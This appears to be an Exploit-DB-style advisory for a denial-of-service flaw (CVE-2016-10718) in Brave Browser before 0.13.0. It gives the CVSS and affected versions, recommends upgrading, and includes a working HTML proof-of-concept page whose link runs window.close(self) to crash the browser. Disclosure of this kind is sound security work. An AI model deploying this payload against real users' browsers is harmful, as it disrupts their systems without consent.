Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.

vendor:

Brave Browser

by:

Sahil Tikoo

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Brave Browser

Affected Version From: 0.12.5

Affected Version To: 0.13.0

Patch Exists: YES

Related CWE: CVE-2016-10718

CPE: a:brave:brave_browser

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux, Ubuntu, Windows OS

2017

Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.

A vulnerability exists in Brave Browser versions prior to 0.13.0, which allows an attacker to remotely consume resources on the target system by executing a window.close(self) JavaScript code.

Mitigation:

Upgrade to Brave Browser version 0.13.0 or later.

Source

Exploit-DB raw data:

# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux,Ubuntu ,Windows OS
# CVE : CVE-2016-10718

<html>
<title>Brave Window Object Remote Denial of Service.</title>
<head></head>

<body><br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></br></br> </h2>

<center>
<b>Click the below link to Trigger the Vulnerability..</b><br><br>
<hr></hr>

<hr></hr>
<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>

</center>
</body>

</html>